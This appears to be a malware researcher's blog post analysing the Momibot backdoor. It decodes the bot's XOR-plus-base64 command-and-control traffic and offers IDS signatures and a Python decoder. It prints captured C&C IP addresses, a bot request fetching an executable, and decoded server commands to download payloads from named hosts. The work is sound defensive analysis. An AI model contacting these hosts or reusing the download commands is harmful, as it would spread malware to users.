The malware sample I am going to look at today is classified as Backdoor:Win32/Momibot by Microsoft and also referred to as Backdoor/IRCNite by some other AV vendors.
Packet captures of the sample from my automated sandbox run look something like this -
So, basically the Trojan is communicating on TCP ports 8090 as well as 80. Forcing Wireshark to decode packets on TCP port 8090 as HTTP, we get a bunch of requests like -
POST /v4/index.php HTTP/1.0
Host: 203.146.253.110
Content-Type: text/xml
Content-Length: 137
byE8PCdtbyM6PTRzOjdudGBmZmpqYGpjYGp0fG1vfCE8PCdt
And responses -
HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Wed, 03 Aug 2011 06:58:52 GMT
Content-Type: text/xml
Connection: close
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache
Content-Length: 56
Content-Disposition: inline
HBhvITw8J21jbzckczk6N250YmRrY2pkYGFqZHRtbzonNj5tOycnI2l8fGtifWJkZH1gYH1qa3xjY2NifTYrNm98Oic2Pm1vfDckbW8+Oj0gJ3M5OjdudGdia2VmZmVqY3RtbzonNj5tOycnI2l8fDg9PCQ/Njc0NiU6NiR9Oj01PHwyITIxOjB8MCAgfCcyMSB9MCAgb3w6JzY+bW98Pjo9ICdtb3whPDwnbQ==
Now, this looks like a base64-encoded HTTP “POST” request. Firing up Malzilla and using the built-in base64 decoder we get -
o!<<'mco7$s9:7ntbdkcjd`ajdtmo:'6>m;''#i||kb}bdd}``}jk|cccb}6+6o|:'6>mo|7$mo>:= 's9:7ntgbkeffejctmo:'6>m;''#i||8=<$?6746%:6$}:=5<|2!21:0|0 |'21 }0 o|:'6>mo|>:= 'mo|!<<'m
Darn! Some sort of encryption, I guess. While this may look like a dead end, the next couple of HTTP requests have some clues as to what's happening here -
GET /0001.exe HTTP/1.0
Host: 81.177.33.98
Content-Type: text/xml
Content-Length: 0
So, it looks like the Bot is fetching this EXE. Taking a wild shot here, with the following assumptions -
- The C&C issuing commands to the Bot to download 0001.exe
- Simple XOR based encryption
let's try to brute-force the base64-decoded response in Malzilla and see if we can get the XOR key.
And voila – the key is “53”! Agreed, I am not always that lucky, but hey, this just saved me tons of time that I would have wasted reversing the binary, which by the way is packed with “PEcompact 2.xx”.
So, now that we know that the Bot is using simple XOR+base64 encoding for communicating with its C&C, we can completely decode the communication protocol. Turns out it's XML! Here is what the communication looks like (one line per message, the client's id being the bot id from the binfo check-in) -
CLIENT: <root><binfo id='3559939039' nt='1' bv='4.6' lt='LAN' os='Windows XP Professional '> </binfo></root>
SERVER: OK<root>0<tsync id='1312354849'/></root>
CLIENT: <root><ping id='3559939039'/></root>
SERVER: OK<root>0<dw jid='1780973297'> <item>http://xx.xx.xx.yy/0001.exe</item> </dw><minst jid='418655690'><item>http://knowledgeview.info/arabic/css/tabs.css</item></minst></root>
CLIENT: <root><jresp id='3559939039'><item jid='1780973297' jstat='4'/><item jid='418655690' jstat='4'/></jresp></root>
SERVER: OK0
CLIENT: <root><jresp id='3559939039'><item jid='1780973297' jstat='1'/></jresp></root>
SERVER: OK0
CLIENT: <root><jresp id='3559939039'><item jid='418655690' jstat='1'/></jresp></root>
SERVER: OK0
There is also a hint of XML being used in the HTTP request itself, via the “Content-Type:” header. However, it looks like the malware author forgot he was going to use encryption ;) All the samples that I have analyzed so far on my setup had the XOR key hardcoded to “53”. Pretty lame, huh?! – because you can completely automate this process using a simple Python script, which can then be used for checking new commands sent out by the C&C.
You can find the full script at http://pastebin.com/N6gJz0Jv
Before starting communication with the C&C, this Trojan checks for the presence of UPnP devices on the network, which I think it does to figure out whether it is connecting from a LAN or from a home PPP connection (note the lt='LAN' attribute in the check-in above). Based on this the Trojan may change behavior. At the time of this analysis the C&C was instructing the Bot to download Win32/FakeRean (belonging to the FakeAV family) malware.
Time to sig this bad boy – even though it may seem that the Trojan is using encryption, it is still possible to create an IDS signature as long as the XOR key remains the same. This is because the XOR+base64 encoding of the initial (XML) string will always be the same, so its base64 prefix is a constant. Based on this we can use two patterns, “<root><binfo id=” and “<root><ping id=”, for creating the signatures -
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible Backdoor:Win32/Momibot checkin"; flow:established,to_server; content:"POST"; http_method; uricontent:"index.php"; nocase; content:"byE8PCdtbzE6PTU8czo3"; http_client_body; nocase; classtype: trojan-activity; sid:xxxxxxxxxx; rev:1;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible Backdoor:Win32/Momibot Ping request"; flow:established,to_server; content:"POST"; http_method; uricontent:"index.php"; nocase; content:"byE8PCdtbyM6PTRzOjdu"; http_client_body; nocase; classtype: trojan-activity; sid:xxxxxxxxxxx; rev:1;)
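The decoding described above and the derivation of the two signature patterns, written out as an added Python example (my own code, not the pastebin script): it strips the base64 and XOR layers from the two bodies captured above, brute-forces the single-byte key by looking for the XML root tag, and regenerates the content: strings used in the rules. The function names are my own, and the only assumption is that the key Malzilla reported as “53” is the byte 0x53.

```python
import base64
from typing import Optional

# Single-byte XOR key seen in every sample; Malzilla reports it as "53", i.e. byte 0x53.
KEY = 0x53

# Constructed from the captured exchange quoted above: the bot's ping request body
# and the C&C task response body (base64 over XOR-obfuscated XML).
PING_REQUEST_B64 = "byE8PCdtbyM6PTRzOjdudGBmZmpqYGpjYGp0fG1vfCE8PCdt"
TASK_RESPONSE_B64 = (
    "HBhvITw8J21jbzckczk6N250YmRrY2pkYGFqZHRtbzonNj5tOycnI2l8fGtifWJkZH1gYH1q"
    "a3xjY2NifTYrNm98Oic2Pm1vfDckbW8+Oj0gJ3M5OjdudGdia2VmZmVqY3RtbzonNj5tOycn"
    "I2l8fDg9PCQ/Njc0NiU6NiR9Oj01PHwyITIxOjB8MCAgfCcyMSB9MCAgb3w6JzY+bW98Pjo9"
    "ICdtb3whPDwnbQ=="
)

def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply the single-byte XOR layer (symmetric: the same call encodes and decodes)."""
    return bytes(b ^ key for b in data)

def decode_body(b64_body: str, key: int = KEY) -> str:
    """Strip base64, then the XOR layer; latin-1 so any stray byte still decodes."""
    return xor_bytes(base64.b64decode(b64_body), key).decode("latin-1")

def encode_body(plaintext: str, key: int = KEY) -> str:
    """Reverse of decode_body: what the bot puts on the wire for a given XML string."""
    return base64.b64encode(xor_bytes(plaintext.encode("latin-1"), key)).decode("ascii")

def recover_key(b64_body: str, marker: bytes = b"<root>") -> Optional[int]:
    """Brute-force the key: only the right one makes the XML root tag appear in the body."""
    raw = base64.b64decode(b64_body)
    for candidate in range(256):
        if marker in xor_bytes(raw, candidate):
            return candidate
    return None

def signature_pattern(prefix: str, key: int = KEY) -> str:
    """Base64 text an IDS can match for a fixed XML prefix. Only complete 3-byte groups
    encode to fixed 4-character quads, so a trailing 1-2 bytes are dropped: their quad
    would change with whatever bytes follow them (the bot id, here)."""
    usable = len(prefix) - len(prefix) % 3
    return encode_body(prefix[:usable], key)

if __name__ == "__main__":
    print("recovered key: 0x%02x" % recover_key(TASK_RESPONSE_B64))
    print("C->S:", decode_body(PING_REQUEST_B64))
    print("S->C:", decode_body(TASK_RESPONSE_B64))
    for prefix in ("<root><binfo id=", "<root><ping id="):
        print("content:%r" % signature_pattern(prefix))
```

Running it reproduces the ping and task messages from the table above and prints exactly the two content: strings in the rules, so the same script can re-derive patterns for a sample that turns up with a different key.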
Sometimes dynamic analysis can give quite a head start when it comes to analyzing malware! If you see more samples of this family in the wild using a different XOR key, please do drop me a note. Have fun with the script! :)